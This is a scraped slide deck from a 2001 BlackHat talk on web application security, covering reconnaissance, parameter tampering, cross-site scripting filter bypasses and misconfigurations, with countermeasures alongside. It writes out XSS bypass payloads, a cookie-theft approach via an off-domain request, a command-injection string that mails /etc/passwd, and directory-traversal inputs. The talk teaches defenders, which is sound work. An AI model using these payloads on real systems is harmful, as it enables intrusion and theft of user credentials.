Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Web Application Security: The Land that Information Security Forgot

Web Application Security: The Land that Information Security Forgot

Today, the vast majority of those within information security have heard about web application security and posses at least a vague understanding of the risks involved. However, the multitude of attacks which make this area of security important, for the most part, go undocumented, unexplained and misunderstood. As a result, our web applications become undefended and at the mercy of a determined attacker. In order to gain a deeper understanding of the threats, witnessing these attacks first hand is essential.

Make no mistake, insecure and unprotected web applications are the fastest, easiest, and arguably the most utilized route to compromise networks and exploit users. What's worse is that conventional security measures lack the proper safeguards and offer little protection, resulting in nothing more than a "false sense of security".

This discussion will cover theory surrounding some of the more dangerous web application attacks, examples of the attack in action, and possible countermeasures.

Founder and chairman of WhiteHat Security, and former information security officer with Yahoo!. As information security officer at Yahoo!, Jeremiah was designing, auditing, and penetration-testing the huge company's web applications which demand highest security.

During his past 5 years of employment, Jeremiah has been researching and applying information security with special emphasis on prevention of web application sabotage. Grossman has presented "Web Application Security" talks at many security conventions such as the Defcon, Air Force and Technology Conference, ToorCon, and others.

Jeremiah is a lead contributor to the "Open Web Application Security Project" and considered to be among the foremost web security experts.

  • Login to see the comments

Web Application Security: The Land that Information Security Forgot

  1. 1. <ul><li>BlackHat Amsterdam 2001 </li></ul><ul><li>Web Application Security </li></ul><ul><li>The Land that Information Security Forgot. </li></ul><ul><li>Presenter: Jeremiah Grossman </li></ul>Copyright 2001 WhiteHat Security All Rights Reserved
  2. 2. Topics <ul><li>Web Application Security Landscape </li></ul><ul><li>Common Web Application Security Mistakes </li></ul><ul><li>Web Application Attack Methodologies </li></ul>2001 © WhiteHat Security, Inc.
  3. 3. Topics <ul><li>Web Application Attack Methodologies </li></ul><ul><li>Information & Discovery </li></ul><ul><li>Input Manipulation & Parameter Tampering </li></ul><ul><li>Cross-Site Scripting </li></ul><ul><li>System Mis-Configuration </li></ul>2001 © WhiteHat Security, Inc.
  4. 4. But Why!? <ul><li>Easiest way to compromise hosts, networks and </li></ul><ul><li>users. </li></ul><ul><li>Widely deployed. </li></ul><ul><li>No Logs! (POST Request payload) </li></ul><ul><li>Incredibly hard to defend against or detect. </li></ul><ul><li>Most don’t think of locking down web applications. </li></ul><ul><li>Intrusion Detection is a joke. </li></ul><ul><li>Firewall? What firewall? I don’t see no any firewall. </li></ul><ul><li>Encrypted transport layer does nothing. </li></ul><ul><li>Best of all, no one is looking anyway. </li></ul>2001 © WhiteHat Security, Inc.
  5. 5. How much easier can it get!? Oh right. Unicode 2001 © WhiteHat Security, Inc.
  6. 6. Web Application The Simple Definition <ul><li>A web application or web service is a </li></ul><ul><li>software application that is accessible </li></ul><ul><li>using a web browser or HTTP(s) user </li></ul><ul><li>agent. </li></ul>2001 © WhiteHat Security, Inc.
  7. 7. Web Security Layers 2001 © WhiteHat Security, Inc.
  8. 8. The Implementation <ul><li>Entertainment </li></ul><ul><li>Message Boards </li></ul><ul><li>WebMail </li></ul><ul><li>Guest Books </li></ul><ul><li>Voting Polls </li></ul>E-Commerce Shopping Auctions Banking Stock Trading Just Plain Crazy Printers PDA’s Cell Phones System Configuration .NET/Passport 2001 © WhiteHat Security, Inc.
  9. 9. Firewall 2001 © WhiteHat Security, Inc.
  10. 10. 2001 © WhiteHat Security, Inc.
  11. 11. Common Web Application Security Mistakes 2001 © WhiteHat Security, Inc.
  12. 12. Trusting Client-Side Data <ul><li>DO NOT TRUST CLIENT-SIDE DATA! </li></ul><ul><li>Trusting Client-Side Data is #1 cause of vulnerabilities. </li></ul><ul><li>Identify all input parameters that </li></ul><ul><li>trust client-side data. </li></ul>2001 © WhiteHat Security, Inc.
  13. 13. Trusting Client-Side Data <ul><li>The Level of Trust </li></ul><ul><li>E-Commerce Shopping </li></ul><ul><li>Numbers </li></ul><ul><li><input type=hidden value=2149.37> 2149.00 </li></ul><ul><li>Too much for a new VAIO! </li></ul><ul><li><input type=hidden value=2.99> 2.99 </li></ul><ul><li>Now On Sale! </li></ul>2001 © WhiteHat Security, Inc.
  14. 14. Trusting Client-Side Data <ul><li>The Level of Trust </li></ul><ul><li>Searches/Queries/Templates </li></ul><ul><li>Path </li></ul><ul><li> </li></ul><ul><li>Or better yet… </li></ul><ul><li> </li></ul>2001 © WhiteHat Security, Inc.
  15. 15. Unescaped Special Characters <ul><li>! @ $ % ^ & * ( ) -_ + ` ~ | [ ] { } ; : ' &quot; ? / , . > < </li></ul><ul><li>Check for: </li></ul><ul><li>Unescaped special characters </li></ul><ul><li>within input strings </li></ul>2001 © WhiteHat Security, Inc.
  16. 16. HTML Character Filtering <ul><li>Proper handling of special characters </li></ul><ul><li>> => &gt; </li></ul><ul><li>< => &lt; </li></ul><ul><li>&quot; => &quot; </li></ul><ul><li>& => &amp; </li></ul><ul><li>Null characters should all be removed. %00 </li></ul>2001 © WhiteHat Security, Inc.
  17. 17. More mistakes… <ul><li>SUID (Does a web application really need root?) </li></ul><ul><li>Authentication mechanisms using technologies such </li></ul><ul><li>as JavaScript or ActiveX. </li></ul><ul><li>Lack of re-authenticating the user before issuing new </li></ul><ul><li>passwords or performing critical tasks. </li></ul><ul><li>Hosting of uncontrolled data on a protected domain. </li></ul>2001 © WhiteHat Security, Inc.
  18. 18. Information & Discovery <ul><li>Spidering/Site Crawling </li></ul><ul><li>Identifiable Characteristics </li></ul><ul><li>Errors and Response Codes </li></ul><ul><li>File/Application Enumeration </li></ul><ul><li>Network Reconnaissance </li></ul>2001 © WhiteHat Security, Inc.
  19. 19. Spidering/Site Crawling <ul><li>Site Map </li></ul><ul><li>Service Map </li></ul><ul><li>Documentation </li></ul><ul><li>Hidden Services </li></ul><ul><li>CGI's and Forms </li></ul><ul><li>Email addresses </li></ul>Tools: WGET 2001 © WhiteHat Security, Inc.
  20. 20. Identifiable Characteristics <ul><li>Comment Lines </li></ul><ul><li>URL Extensions </li></ul><ul><li>Meta Tags </li></ul><ul><li>Cookies </li></ul><ul><li>Client-Side scripting languages </li></ul><ul><li>Enormous wealth of information about process flows, debug command, system types and configurations. </li></ul>2001 © WhiteHat Security, Inc.
  21. 21. Error and Response Codes <ul><li>HTTP Response Headers </li></ul><ul><li>Server: IBM/Apache 1.3.19 </li></ul><ul><li>Cookie Characteristics </li></ul><ul><li>Error Messages </li></ul><ul><li>Exception Messages (Java / SQL) </li></ul><ul><li>404 Error Pages </li></ul><ul><li>Failed Login </li></ul><ul><li>Locked Account </li></ul><ul><li>Database or file non-existent </li></ul>2001 © WhiteHat Security, Inc.
  22. 22. File/Application Enumeration <ul><li>Commonly referred to as “forced browsing” or “CGI Scanning”. </li></ul><ul><li>Directory Browsing Index Listings </li></ul><ul><li> </li></ul><ul><li>Try: </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li> </li></ul><ul><li>Tools: Whisker </li></ul><ul><li> </li></ul>2001 © WhiteHat Security, Inc.
  23. 23. File/Application Enumeration <ul><li>Sample Files </li></ul><ul><li>Template Directories </li></ul><ul><li>Temp or Backup files </li></ul><ul><li>Hidden Files </li></ul><ul><li>Vulnerable CGIs </li></ul>2001 © WhiteHat Security, Inc.
  24. 24. Network Reconnaissance <ul><li>WHOIS </li></ul><ul><li>ARIN </li></ul><ul><li>Port Scan (Nmap) </li></ul><ul><li>Traceroute </li></ul><ul><li>Ping Scan (Nmap or HPING) </li></ul><ul><li>NSLookup/ Reverse DNS </li></ul><ul><li>DNS Zone Transfer (DIG) </li></ul><ul><li>OS Finger Printing (Nmap or Xprobe) </li></ul>2001 © WhiteHat Security, Inc.
  25. 25. Input Manipulation Parameter Tampering &quot;Twiddling Bits.&quot; <ul><li>Cross-Site Scripting </li></ul><ul><li>Filter-Bypass Manipulation </li></ul><ul><li>OS Commands </li></ul><ul><li>Meta Characters </li></ul><ul><li>Path/Directory Traversal </li></ul><ul><li>Hidden Form Field Manipulation </li></ul><ul><li>HTTP Headers </li></ul>2001 © WhiteHat Security, Inc.
  26. 26. Cross-Site Scripting Bad name given to a dangerous security issue <ul><li>Attack targets the user of the system rather </li></ul><ul><li>than the system itself. </li></ul><ul><li>Outside client-side languages executing within </li></ul><ul><li>the users web environment with the same </li></ul><ul><li>level of privilege as the hosted site. </li></ul>2001 © WhiteHat Security, Inc.
  27. 27. Client-Side Scripting Languages <ul><li>DHTML (HTML, XHTML, HTML x.0) </li></ul><ul><li>Opens all the doors. </li></ul><ul><li>JavaScript (1.x) Browser/DOM Manipulation </li></ul><ul><li>Java (Applets) Malicious Applets </li></ul><ul><li>VBScript Browser/DOM Manipulation </li></ul><ul><li>Flash Dangerous Third-Party Interactivity </li></ul><ul><li>ActiveX Let me count the ways… </li></ul><ul><li>XML/XSL Another Door Opener </li></ul><ul><li>CSS Browser/DOM Manipulation </li></ul>2001 © WhiteHat Security, Inc.
  28. 28. Accessing the DOM & Outside the DOM <ul><li>Document Object Model (DOM) </li></ul><ul><li>Client-Side languages possess an enormous amount of power to </li></ul><ul><li>access and manipulate the DOM within a browser. </li></ul><ul><li>Complex & diverse interconnections create an increased the level of </li></ul><ul><li>access within the DOM. </li></ul><ul><li>Increased level of access to read & modify DOM data ranging </li></ul><ul><li>anything from background colors, to a file on your systems, and </li></ul><ul><li>beyond to executing systems calls. </li></ul>2001 © WhiteHat Security, Inc.
  29. 29. Authentication/Authorization “Hand in the cookie jar.” <ul><li>Cookies are restricted to domains ( </li></ul><ul><li>Uncontrolled data on a restricted domain can access </li></ul><ul><li>the cookie data. </li></ul><ul><li>JavaScript Expression: &quot;document.cookie&quot; </li></ul><ul><li> </li></ul><ul><li>document.img.src </li></ul><ul><li>Hidden Form Submit </li></ul><ul><li> </li></ul><ul><li>Cookie data is passed to a CGI through a GET request to a off </li></ul><ul><li>domain host. </li></ul>2001 © WhiteHat Security, Inc.
  30. 30. The Scenarios <ul><li>Trick a user to re-login to a spoofed page </li></ul><ul><li>Compromise authentication credentials </li></ul><ul><li>Load dangerous of maliscious ActiveX </li></ul><ul><li>Re-Direct a user or ALL users </li></ul><ul><li>Crash the machine or the browser </li></ul>2001 © WhiteHat Security, Inc.
  31. 31. CSS Danger “The Remote Launch Pad.” <ul><li>Successfully CSS a user via a protected domain. </li></ul><ul><li>Utilizing a Client-Side utility (JavaScript, ActiveX, </li></ul><ul><li>VBScript, etc.), exploit a browser hole to download </li></ul><ul><li>a trojan/virus. </li></ul><ul><li>User is unknowingly infected/compromised within </li></ul><ul><li>a single HTTP page load. </li></ul><ul><li>ActiveX Netcat Anyone? </li></ul>2001 © WhiteHat Security, Inc.
  32. 32. Dangerous HTML “HTML Bad” <ul><li><APPLET> Malicious Java Applications </li></ul><ul><li><BODY> Altering HTML Page Characteristics </li></ul><ul><li><EMBED> Embedding Third-Party Applications (Flash, etc.) </li></ul><ul><li><FRAME> Directly calling in other uncontrolled HTML </li></ul><ul><li><FRAMESET> Directly calling in other uncontrolled HTML </li></ul><ul><li><HTML> Altering HTML Page Characteristics </li></ul><ul><li><IFRAME> Directly calling in other uncontrolled HTML </li></ul><ul><li><IMG> SCRing Protocol attacks and other abuses </li></ul><ul><li><LAYER> Directly calling in other uncontrolled HTML </li></ul><ul><li><ILAYER> Directly calling in other uncontrolled HTML </li></ul><ul><li><META> META Refreshes. (Client-Redirects) </li></ul><ul><li><OBJECT> ActiveX (Nuff Said) </li></ul><ul><li><SCRIPT> JavaScript/VBScript Loading </li></ul><ul><li><STYLE> Style Sheet and Scripting Alterations </li></ul>2001 © WhiteHat Security, Inc.
  33. 33. Dangerous Attributes “Attributes Bad” <ul><li>ATTRIBUTE DANGER LIST </li></ul><ul><li>(Any HTML Tag that has these attributes) </li></ul><ul><li>STYLE </li></ul><ul><li>SRC </li></ul><ul><li>HREF </li></ul><ul><li>TYPE </li></ul>2001 © WhiteHat Security, Inc.
  34. 34. Filter Bypassing &quot;JavaScript is a Cockroach&quot; <ul><li>There are all kinds of input filters web applications </li></ul><ul><li>implement to sanitize data. </li></ul><ul><li>This section will demonstrate many known ways input </li></ul><ul><li>filter's can be bypassed to perform malicious functions </li></ul><ul><li>such as, cross-scripting, browser-hijacking, cookie theft, </li></ul><ul><li>and others. </li></ul><ul><li>Client-Side Scripting (CSS) attacks require the execution </li></ul><ul><li>of either, JavaScript, Java, VBScript, ActiveX, Flash and </li></ul><ul><li>some others. </li></ul><ul><li>We will be assuming that these web applications accept </li></ul><ul><li>HTML, at least in a limited sense. </li></ul>2001 © WhiteHat Security, Inc.
  35. 35. Testing the Filters <ul><li>Submit all the raw HTML tags you can find, and then </li></ul><ul><li>view the output results. </li></ul><ul><li>Combine HTML with tag attributes, such as SRC, </li></ul><ul><li>STYLE, HREF and OnXXX (JavaScript Event </li></ul><ul><li>Handler). </li></ul><ul><li>This will show what HTML is allowed, what the </li></ul><ul><li>changes were, and possible what dangerous HTML </li></ul><ul><li>can be exploited. </li></ul>2001 © WhiteHat Security, Inc.
  36. 36. SCRIPT TAG <ul><li>Description: The script tag is the simplest form of </li></ul><ul><li>inputting JavaScript </li></ul><ul><li>Exploit: </li></ul><ul><li><SCRIPT>alert('JavaScript Executed');</SCRIPT> </li></ul><ul><li>Solution: replace all &quot;script&quot; tags. </li></ul>2001 © WhiteHat Security, Inc.
  37. 37. SRCing JavaScript Protocol <ul><li>Description: The JavaScript protocol will execute the </li></ul><ul><li>expression entered after the colon. Netscape Tested. </li></ul><ul><li>Exploit: <IMG SRC=&quot;javascript:alert('JavaScriptExecuted');&quot;> </li></ul><ul><li>Solution: Replace &quot;javascript&quot; strings in all SRC & HREF </li></ul><ul><li>attributes in HTML tags with another string. </li></ul><ul><li>Exp: <IMG SRC=&quot;java_script:alert('JavaScript Executed');&quot;> </li></ul><ul><li>will render this script useless. </li></ul><ul><li>Further Information: </li></ul><ul><li>Any HTML tag with a SRC attribute will execute this script on </li></ul><ul><li>page load or on link activation. </li></ul><ul><li>As a further protocol pattern matching, keywords &quot;livescript&quot; and &quot;mocha&quot; must be </li></ul><ul><li>also replaced for the hold the same possibilities. </li></ul><ul><li>*** Netscape code names *** </li></ul>2001 © WhiteHat Security, Inc.
  38. 38. SRCing JavaScript Protocol w/ HTML Entities <ul><li>Description: As another derivative of the previous, Decimal HTML entities within these </li></ul><ul><li>strings can cause filter bypass. </li></ul><ul><li>Exploit: </li></ul><ul><li><IMG SRC=&quot;javasc ript:alert('JavaScript Executed');&quot;> </li></ul><ul><li>Replacement of entities 10 - 11 - 12 - 13 will also succeed. </li></ul><ul><li>Hex instead of Decimal HTML entities will also bypass input filters and execute. </li></ul><ul><li><IMG SRC=&quot;javasc ript:alert('JavaScript Executed');&quot;> </li></ul><ul><li>As well as placing multiple ZERO's in front. </li></ul><ul><li><IMG SRC=javasc ript:alert('JavaScript Executed');> </li></ul><ul><li>Solution:Filter these entities within the string then do your further pattern matching </li></ul>2001 © WhiteHat Security, Inc.
  39. 39. AND CURLY <ul><li>Description: </li></ul><ul><li>Obscure Netscape JavaScript execution line. Exact syntax is </li></ul><ul><li>needed to execute. </li></ul><ul><li>Exploit: </li></ul><ul><li><IMG SRC=&quot;&{alert('JavaScript Executed')};&quot;> </li></ul><ul><li>Solution: </li></ul><ul><li><IMG SRC=&quot;XXalert('JavaScript Executed')};&quot;> </li></ul><ul><li>or something similar will nullify the problem. </li></ul>2001 © WhiteHat Security, Inc.
  40. 40. Style Tag Conversion <ul><li>Description: Turn a style tag into a JavaScript expression. </li></ul><ul><li>Exploit: </li></ul><ul><li><style TYPE=&quot;text/javascript&quot;>JS EXPRESSION</style> </li></ul><ul><li>Solution: Replace the &quot;javascript&quot; string with &quot;java_script&quot; and all should be fine. </li></ul><ul><li>Exploit: Import dangerous CSS. </li></ul><ul><li><STYLE type=text/css> </li></ul><ul><li>@import url(http://server/very_bad.css); </li></ul><ul><li></STYLE> </li></ul><ul><li>Solution: Filter and replace the &quot;@import“ </li></ul><ul><li>Exploit: Import a JavaScript Expression through a style tag. </li></ul><ul><li><style TYPE=&quot;text/css&quot;> </li></ul><ul><li>@import url(javascript:alert('JavaScript Executed')); IE HOLE </li></ul><ul><li></style> </li></ul><ul><li>Solution: Again, filter and replace the &quot;@import&quot; and the &quot;javascript:&quot; just to be safe. </li></ul>2001 © WhiteHat Security, Inc.
  41. 41. Using CSS <ul><li>Click to Execute </li></ul><ul><li>User must click on a link to execute the script. </li></ul><ul><li>(Search Fields, 404 Errors, etc.) </li></ul><ul><li><SCRIPT>alert(‘JavaScript Launched’);</SCRIPT> </li></ul><ul><li>Mass Injection </li></ul><ul><li>All user viewing the page execute the script. </li></ul><ul><li>(Guest Books, Message Boards) </li></ul><ul><li>Post a JavaScript onto a board </li></ul><ul><li>Message <SCRIPT>alert(‘JavaScript Launched’);</SCRIPT> </li></ul>2001 © WhiteHat Security, Inc.
  42. 42. Using CSS <ul><li>Directed Injection </li></ul><ul><li>Soon as user load the page, script executes. </li></ul><ul><li>(WebMail, HTML Mail, Messaging) </li></ul><ul><li>Send an email with… </li></ul><ul><li>HELLO <SCRIPT>alert(‘JavaScript Launched’);</SCRIPT> </li></ul><ul><li>Holding the door open </li></ul><ul><li>(FeedBack, Profiles Pages, anything persistent…) </li></ul><ul><li>Load HTML Page with sourced scripts. </li></ul><ul><li><LAYER SRC=“javascript.js”></LAYER> </li></ul>2001 © WhiteHat Security, Inc.
  43. 43. Twiddling Bits <ul><li>OS Commands </li></ul><ul><li>Meta Characters </li></ul><ul><li>Path/Directory Traversal </li></ul>2001 © WhiteHat Security, Inc.
  44. 44. Power of the Semi-Colon piping input to the command line. <ul><li>OS Commands </li></ul><ul><li> </li></ul><ul><li>Append: </li></ul><ul><li>;+sendmail+/etc/passwd </li></ul><ul><li>Piping: </li></ul><ul><li>|+less </li></ul><ul><li>Re-Direct: </li></ul><ul><li>>+/ </li></ul>2001 © WhiteHat Security, Inc.
  45. 45. Power of Special Characters piping input to the command line. <ul><li>Meta Characters </li></ul><ul><li> </li></ul><ul><li>Altered: </li></ul><ul><li>* </li></ul>2001 © WhiteHat Security, Inc.
  46. 46. Power of the Dots and Slashes piping input to the command line. <ul><li>Path Directory Traversal </li></ul><ul><li> </li></ul><ul><li>DotDot Slash: </li></ul><ul><li> </li></ul><ul><li>Dot Slash: </li></ul><ul><li> </li></ul><ul><li>Double DotDot Slash: </li></ul><ul><li>….//….//etc/passwd </li></ul>2001 © WhiteHat Security, Inc.
  47. 47. More Filter Bypassing <ul><li>Method Alteration (HEAD, PUT, POST, GET, ect.) </li></ul><ul><li>URL Encode </li></ul><ul><li> </li></ul><ul><li>Null Characters </li></ul><ul><li> </li></ul><ul><li>More… </li></ul><ul><li>Alternate Case, Unicode, String Length, Multi-Slash, etc. </li></ul>2001 © WhiteHat Security, Inc.
  48. 48. More bits… <ul><li>Hidden Form Field Manipulation </li></ul><ul><li>HTTP Headers (Cookies, Referers…) </li></ul>2001 © WhiteHat Security, Inc.
  49. 49. System Mis-Configurations “patches, patches, and more patches…&quot; <ul><li>Vendor Patches </li></ul><ul><li>Default Accounts </li></ul><ul><li>Check: </li></ul><ul><li>Web Server permission by directory browsing </li></ul><ul><li>Software version from Discovery </li></ul><ul><li>Known default accounts in commercial platforms </li></ul><ul><li>BugTraq </li></ul><ul><li>Anonymous FTP open on Web Server </li></ul>2001 © WhiteHat Security, Inc.
  50. 50. Other Dirty Tricks “Abuse can be far more time consuming, costly and dangerous” <ul><li>Mass Account Lockout </li></ul><ul><li>Attacks against brute force </li></ul><ul><li>3 Time Failure Lock-Out Rule </li></ul><ul><li>Purposely fail the 3 attempts again thousands of accounts. If the login is sequential, even better. </li></ul>2001 © WhiteHat Security, Inc.
  51. 51. Other Dirty Tricks “Abuse can be far more time consuming, costly and dangerous” <ul><li>Brute Force/Page Sequencing </li></ul><ul><li>Attacks against process flow </li></ul><ul><li>Use 1 0r 2 pieces of data to get the rest. </li></ul><ul><li>Slowly brute force the process for data </li></ul><ul><li>aggregation. </li></ul>2001 © WhiteHat Security, Inc.
  52. 52. Thank You BlackHat and Attendees Questions? <ul><li>Jeremiah Grossman </li></ul><ul><li>[email_address] </li></ul><ul><li>WhiteHat Security </li></ul><ul><li>All presentation updates will be available on </li></ul><ul><li> </li></ul>2001 © WhiteHat Security, Inc.